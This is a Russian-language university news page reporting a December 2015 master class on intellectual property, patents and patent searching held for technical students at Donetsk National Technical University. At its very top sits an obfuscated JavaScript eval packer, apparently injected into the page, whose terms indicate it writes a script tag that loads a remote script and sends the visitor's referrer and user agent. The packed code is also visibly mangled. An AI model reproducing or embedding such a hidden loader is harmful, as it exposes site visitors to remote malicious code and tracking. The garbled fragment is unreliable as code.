

7 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";',30,30,'document|javascript|encodeURIComponent|src|write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|adbtt|var|u0026u|referrer|bdrba|js|php'.split('|'),0,{}))

декабря 2015 г. в отделе Интеллектуальной собственности и патентно-лицензионной работы (ИСиПЛР) Донецкого национального технического университета (ДонНТУ) для студентов технических специальностей прошел мастер класс " **Интеллектуальная собственность**", на котором участники усвоили элементарные знания по созданию, защите и использованию объектов интеллектуальной собственности, в частности изобретений, получили консультацию и ответы на интересующие их вопросы.



К сожалению, большинство участников не проходили обучение по данной дисциплине и их знания по основным аспектам интеллектуальной собственности весьма расплывчаты.

Поэтому ребятам было интересно узнать как получить патент на изобретение и какую пользу этот охранный документ приносит его владельцу, какие права возникают у авторов и патентообладателей и как ими можно распорядиться. Особое внимание в программе уделялось вопросам проведения патентного поиска, формированию навыков владения современными инструментами поиска, отбора и анализа необходимой информации.

Патентный поиск - это важный элемент научной деятельности, его выполнение позволит будущим инженерам опереться на достоверные данные о существующих разработках в своих исследованиях по курсовым, дипломным и другим научным работам.

Со временем, полученные обзорные знания в области изобретательства и патентного права помогут воспитать интерес к своей профессии у студентов технических специальностей, проводить оперативный поиск и "проверку новых идей", избежать ошибок по закреплению прав на новые разработки.

© Изд-во «Донецкая политехника», 2015

© Центр карьеры и общественных коммуникаций ДонНТУ, 2015